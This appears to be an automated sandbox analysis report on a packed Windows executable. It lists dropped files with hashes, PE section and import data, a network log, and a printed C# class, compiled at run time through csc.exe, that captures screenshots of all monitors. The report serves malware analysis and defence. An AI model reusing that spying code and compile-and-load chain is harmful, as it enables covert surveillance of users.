                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umo5u1zc.ty3.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmmkcilq.51y.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2kcugpg.ksk.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                              Entropy (8bit):3.0828533088292396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBpYak7YnqqapNPN5Dlq5J:+RI+ycuZhN7iakSajPNnqX
                                                                                                                                                                                                                              MD5:2E1AC44DD09DFFFF40C62F43DE4B3CC2
                                                                                                                                                                                                                              SHA1:1F78026C840CBB5344A279C8307650C00FB32E3D
                                                                                                                                                                                                                              SHA-256:B98E34E858CBA9C234E0A36BB0B593F2A9530C36E43ED7EA98B5BB5AF7CFB6B8
                                                                                                                                                                                                                              SHA-512:DD9AE3EB68276EF59DC83AFFE264CC1D865BE91D42E9A5B236F431BD68CEFBEEFBB6D3DF42EAC2E163137F37086E8BFF7E54FFF18C58E6468486AE714FEC9F2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.i.f.u.c.m.0.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.i.f.u.c.m.0.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.0.cs

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1004
                                                                                                                                                                                                                              Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                              MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                              SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                              SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                              SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):607
                                                                                                                                                                                                                              Entropy (8bit):5.309174708148683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfwtWZEifwI:V3ka6KOkqeFkOfREifN
                                                                                                                                                                                                                              MD5:0FEAA4EA8189A039B243B5102A2A00A8
                                                                                                                                                                                                                              SHA1:D50E82EC8C0DDA85EB18EB43CA6AA1AB8D602239
                                                                                                                                                                                                                              SHA-256:190561506FB72D988D13E675EA4BBDB7B674529A482B609394CADB4065201366
                                                                                                                                                                                                                              SHA-512:EBAC656B0370AAE9D3866788B0EC746277F7AB3395BBC58CA055227DA7AEFA0A77047FE4D8B1611CB70AE203909219252268476975480C0FCA5C67E42149686D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.0.cs"

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                                              Entropy (8bit):3.1471550848186847
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:6r7oEAtf0KhzBU/Cf6mtJpN09tSpW1ulOa3aq:VNz0NmxO92AK
                                                                                                                                                                                                                              MD5:719CF98F3AC4821BBABF7DD3B1A11C71
                                                                                                                                                                                                                              SHA1:9F90E0DA18EEE79E52F8332711910157E0864CA9
                                                                                                                                                                                                                              SHA-256:125D9B204E259EB552184D228BBD5CA72E713EA4A98571316BF7FA7E22E9B279
                                                                                                                                                                                                                              SHA-512:BCE2C31A597F0F527174B565DA041B92E89E86F7A6592451F81173AFEE75211E1BE84533EECE412AB851B1DD726E6C75E3518C4144E952C42A2F3D33A9275381
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P4zg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.out

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (706), with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1147
                                                                                                                                                                                                                              Entropy (8bit):5.483245337535983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KJfWvukqd3ka6KOkqeFkOfREifIKax5DqBVKVrdFAMBJTH:uWv5ika6NkqeFkyREuIK2DcVKdBJj
                                                                                                                                                                                                                              MD5:00C97A41FF5308765CB7222687DCB344
                                                                                                                                                                                                                              SHA1:C937DF114F8C0DB0AF1F154B19D45DC775C004D2
                                                                                                                                                                                                                              SHA-256:118AD0A421AE031920757A24556D1BA0BC65D1650A8B6678D88D734631EB3890
                                                                                                                                                                                                                              SHA-512:07692479B508A5E8A128A595A8E1E3BE2CDDC329FE8BC5E0314DEF64D0997D8CA979769E02280E51FDF7177C3D69D3829EF28BFDD6BAEE949431276ABAB5E58F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

                                                                                                                                                                                                                              \Device\Null

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                              Entropy (8bit):4.782116412448049
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:PzpLwvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PdLw5pTcgTcgTLs4omvtAFSkIrxMVlmo
                                                                                                                                                                                                                              MD5:FEBAB6B333D59CB4A33F8A62C037B069
                                                                                                                                                                                                                              SHA1:6AB2A3A813CA84362DEB97A888F2A80BA03E6E9B
                                                                                                                                                                                                                              SHA-256:4AF7981B4686FA60A96081B801D8B11EBFF647CC07CDC2817D354DA84A392B69
                                                                                                                                                                                                                              SHA-512:502D531BEE3B707A4F57AF6F42B9A189AD9358CB004A41552BE298957DA7F9EC8F665641B4C728B90BBFBA5BC6B9A189A3F19049D2E450CE0EFA6072DEB522EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..Pinging 760639 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):7.993792447458598
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:KpHYfxnJs6.exe
                                                                                                                                                                                                                              File size:9'081'534 bytes
                                                                                                                                                                                                                              MD5:41b147fd16a94a8ea6164177cf91733c
                                                                                                                                                                                                                              SHA1:f586388782d636b286ef606de997087f451fe11f
                                                                                                                                                                                                                              SHA256:6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
                                                                                                                                                                                                                              SHA512:c15b8cc463186471a12431131d90733f9389d2eded969ee056b1bfe391ab255fc88c4f1b896e05dc6d4f94cba82bf066316fca489047781e13ddfd522e9e5da0
                                                                                                                                                                                                                              SSDEEP:196608:lPWgT2X83i4bCFRu3TN9hoy6Enwc4GgpG0REtHIrq7L3mrbW3jmy+:lDKXe0c3jWyotGgpGLtz7bmrbmyJ
                                                                                                                                                                                                                              TLSH:9296331696F24C81D09328BAE469BD9507716B055FC22FB0E66F6343C04F3385E76ABE
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................C%......C.......C.......C..................+....B.......B......Rich...................

                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Entrypoint:0x88c058
                                                                                                                                                                                                                              Entrypoint Section:.boot
                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                              DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x6779EE8D [Sun Jan 5 02:29:33 2025 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:a413ffcb413e398d1f798a0daa527855

                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              call 00007FD46CBE7670h
                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                              mov ebx, esp
                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                              mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                                                              mov edi, dword ptr [ebx+10h]
                                                                                                                                                                                                                              cld
                                                                                                                                                                                                                              mov dl, 80h
                                                                                                                                                                                                                              mov al, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              mov byte ptr [edi], al
                                                                                                                                                                                                                              inc edi
                                                                                                                                                                                                                              mov ebx, 00000002h
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jnc 00007FD46CBE750Ch
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jnc 00007FD46CBE7573h
                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jnc 00007FD46CBE7607h
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              je 00007FD46CBE752Ah
                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                              mov eax, eax
                                                                                                                                                                                                                              sub edi, eax
                                                                                                                                                                                                                              mov al, byte ptr [edi]
                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                              mov byte ptr [edi], al
                                                                                                                                                                                                                              inc edi
                                                                                                                                                                                                                              mov ebx, 00000002h
                                                                                                                                                                                                                              jmp 00007FD46CBE74BBh
                                                                                                                                                                                                                              mov eax, 00000001h
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jc 00007FD46CBE750Ch
                                                                                                                                                                                                                              sub eax, ebx
                                                                                                                                                                                                                              mov ebx, 00000001h
                                                                                                                                                                                                                              jne 00007FD46CBE754Ah
                                                                                                                                                                                                                              mov ecx, 00000001h
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc ecx, ecx
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jc 00007FD46CBE750Ch
                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                              mov esi, edi
                                                                                                                                                                                                                              sub esi, ebp

                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3e0830xa4.idata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f0000x950.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              0x10000x262240x16800fd694dd45a4b04a8bbbf98600e09367eFalse0.9997178819444444OpenPGP Public Key7.970952206496813IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              0x280000xd8d20x7a00054d3a0f495771bee612675e6dca2199False0.9841188524590164data7.935438613469344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              0x360000x48e40x200808aba42bb9c184f932e258fb926c4c5False0.93359375data7.011148749822864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              0x3b0000x94c0x600db2985095e26f6072509799f1e129852False0.78515625data6.594909833488607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              0x3c0000x1ea40x1c00b7cfe11e640d100aa9e3226902e917eeFalse0.9835379464285714data7.861185148745885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .idata0x3e0000x10000x20023fa6391fbf2c8599d965f756bd54553False0.32421875data2.4842952593420575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .rsrc0x3f0000x10000xa003538a3b76aecf666de9cd2f4c3fa0ccaFalse0.422265625data4.694891787958566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .themida0x400000x44c0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .boot0x48c0000x2bac000x2bac0005f7d59d13a919acc25f7f4a6e7e652cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                              RT_VERSION0x3f0900x39cdata0.4512987012987013
                                                                                                                                                                                                                              RT_MANIFEST0x3f43c0x50dXML 1.0 document, ASCII textEnglishUnited States0.4694508894044857

                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              kernel32.dllGetModuleHandleA
                                                                                                                                                                                                                              USER32.dllCreateWindowExW
                                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                                              ADVAPI32.dllOpenProcessToken
                                                                                                                                                                                                                              GDI32.dllSelectObject

                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.401186943 CET4990480192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.406603098 CET8049904208.95.112.1192.168.2.4
